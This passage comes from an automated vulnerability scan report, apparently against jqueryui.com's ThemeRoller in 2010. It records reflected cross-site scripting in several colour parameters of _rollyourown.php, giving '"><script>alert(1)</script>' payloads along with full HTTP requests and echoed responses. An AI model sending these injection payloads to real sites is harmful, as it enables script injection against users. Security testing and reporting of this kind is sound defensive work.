Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:29 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorDefault" id="bgColorDefault" class="hex" value="fece2f3b5ef\\\"><script>alert(1)</script>005c2396836" />
...[SNIP]...

1.133. http://jqueryui.com/themeroller/_rollyourown.php [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 744d6"><script>alert(1)</script>05da56c372e was submitted in the bgColorError parameter. This input was echoed as 744d6\\\"><script>alert(1)</script>05da56c372e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17744d6"><script>alert(1)</script>05da56c372e&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:44 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorError" id="bgColorError" class="hex" value="d34d17744d6\\\"><script>alert(1)</script>05da56c372e" />
...[SNIP]...

1.134. http://jqueryui.com/themeroller/_rollyourown.php [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27087"><script>alert(1)</script>4a1552b782e was submitted in the bgColorHeader parameter. This input was echoed as 27087\\\"><script>alert(1)</script>4a1552b782e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=81786527087"><script>alert(1)</script>4a1552b782e&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:22 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorHeader" id="bgColorHeader" class="hex" value="81786527087\\\"><script>alert(1)</script>4a1552b782e" />
...[SNIP]...

1.135. http://jqueryui.com/themeroller/_rollyourown.php [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33847"><script>alert(1)</script>d02cc6d9f2e was submitted in the bgColorHighlight parameter. This input was echoed as 33847\\\"><script>alert(1)</script>d02cc6d9f2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e533847"><script>alert(1)</script>d02cc6d9f2e&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:41 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorHighlight" id="bgColorHighlight" class="hex" value="fff9e533847\\\"><script>alert(1)</script>d02cc6d9f2e" />
...[SNIP]...

1.136. http://jqueryui.com/themeroller/_rollyourown.php [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de2ea"><script>alert(1)</script>67e64d9d206 was submitted in the bgColorHover parameter. This input was echoed as de2ea\\\"><script>alert(1)</script>67e64d9d206 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57de2ea"><script>alert(1)</script>67e64d9d206&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:32 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorHover" id="bgColorHover" class="hex" value="ffdd57de2ea\\\"><script>alert(1)</script>67e64d9d206" />
...[SNIP]...

1.137. http://jqueryui.com/themeroller/_rollyourown.php [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 782ad"><script>alert(1)</script>acf6ffbe106 was submitted in the bgColorOverlay parameter. This input was echoed as 782ad\\\"><script>alert(1)</script>acf6ffbe106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c782ad"><script>alert(1)</script>acf6ffbe106&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:48 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorOverlay" id="bgColorOverlay" class="hex" value="5c5c5c782ad\\\"><script>alert(1)</script>acf6ffbe106" />
...[SNIP]...

1.138. http://jqueryui.com/themeroller/_rollyourown.php [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d32"><script>alert(1)</script>2deb2d37d2 was submitted in the bgColorShadow parameter. This input was echoed as e1d32\\\"><script>alert(1)</script>2deb2d37d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityE